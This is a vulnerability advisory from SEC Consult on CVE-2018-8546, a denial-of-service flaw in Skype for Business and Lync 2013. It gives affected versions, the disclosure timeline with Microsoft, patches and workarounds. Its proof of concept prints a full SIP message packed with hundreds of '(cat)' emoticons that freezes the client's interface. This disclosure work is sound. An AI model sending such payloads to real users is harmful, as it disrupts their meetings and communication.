Denial Of Service Vulnerability In Microsoft Skype For Business / Lync

Title

Denial of Service

Product

Microsoft Skype for Business 2016 / Lync 2013

Vulnerable Version

Microsoft Skype for Business 2015 (Lync 2013) before v15.0.5075.1000 Skype for Business 2016: before v16.0.4756.1000

Fixed Version

Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000 Skype for Business 2016 v16.0.4756.1000

CVE Number

CVE-2018-8546

Impact

medium

Found

01.08.2018

By

Sabine Degen (Office Vienna) | SEC Consult Vulnerability Lab

SEC Consult also published a blog post regarding the identified security issue with further background information.

Vendor Description

“Skype for Business (formerly Microsoft Office Communicator and Microsoft Lync) is an instant messaging client used with Skype for Business Server or with Skype for Business Online (available with Microsoft Office 365). Skype for Business is enterprise software.”

Source: https://en.wikipedia.org/wiki/Skype_for_Business

Business Recommendation

Assess the impact of this vulnerability on your business. The patch provided by Microsoft should be installed immediately. Especially if Skype for Business is being used for external communication.

Vulnerability Overview/ Description (CVE-2018-8546)

A large number of emojis (e.g. ~800 kittens) received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform Denial of Service attacks against Skype for Business users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat window of a meeting room in order to freeze the program for all participants and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and therefore are not affected (e.g. killed), only the functions related to graphical user interface become unusable.

Proof Of Concept

After sending a big amount of emojis (~800 kittens) to a Skype for Business chat, the program freezes for a few seconds while rendering the chat window. Continuously sending emojis will make the GUI unusable for the user. Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0 Via: SIP/2.0/tls 127.0.0.1:7490 From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8 To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6 Max-Forwards: 70 CSeq: 12 MESSAGE User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0) Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x Route: <sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA> Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu> Content-Type: text/plain; charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA Content-Length: 4420 Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*" (cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)

Vulnerable / Tested Versions

The following versions have been identified as vulnerable which were the latest versions available at the time of the test:

  • Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
  • Skype for Business 2016 MSO (16.0.93).64-Bit.

Both versions were running on Windows 10 Pro. According to the vendor, all previous versions are affected:

  • Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
  • Skype for Business 2016: before v16.0.4756.1000

Vendor Contact Timeline

2018-08-02: Vulnerability details submitted to Microsoft, MSRC Case 47060 assigned.
2018-08-28: Asking for a status update.
2018-08-30: Vendor: issue has been reproduced, solution to block the user provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue as the provided workaround is not effective for attacks already in progress.
2018-08-31: Vendor: decided to fix the issue, rollout planned for early October.
2018-09-03: Agreed to release advisory after mid October.
2018-10-10: Asking for a status update.
2018-10-10: Microsoft: Issue has been fixed on October 2nd, CVE number will be assigned soon.
2018-10-10: Asking for affected versions, advisory notes
2018-10-10: Microsoft: KB #4461446 and #4092445.
2018-10-10: Reviewing KB articles, asking Microsoft why there is no mention of the security fix in #4092445.
2018-10-11: Microsoft: there was a mistake, the patch needs to be re-released as security fix, agreed on postponing until next Patch Tuesday in November.
2018-10-13: CVE number CVE-2018-8546 issued on Patch Tuesday.
2018-11-14: Coordinated release of security advisory.

Solution

Apply the security patches provided by the vendor. The fixed versions are:

  • Skype for Business 2015 (Lync 2013) version 15.0.5075.1000
  • Skype for Business 2016 (KB4092445) version 16.0.4756.1000

Microsoft provided the following links for further information:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8546

https://support.microsoft.com/en-us/help/4461446/october-2-2018-update-for-skype-for-business-2015-lync-2013-kb4461446
https://support.microsoft.com/en-us/help/4092445/october-2-2018-update-for-skype-for-business-2016-kb4092445

 

Workaround

Disable emoticons in Skype for Business:
Tools -> Options -> IM -> Show emoticons in messages

Or block the user performing the DoS attacks by right-clicking on the contact
and “Change Privacy Relationship”, then click “Blocked Contacts”
(of course this will only work when there is no active DoS attack)

Advisory URL

https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

 

 

EOF Sabine Degen / @2018

Contact

Interested to work with the experts of SEC Consult? Send us your application.
Want to improve your own cyber security with the experts of SEC Consult? Contact our local offices.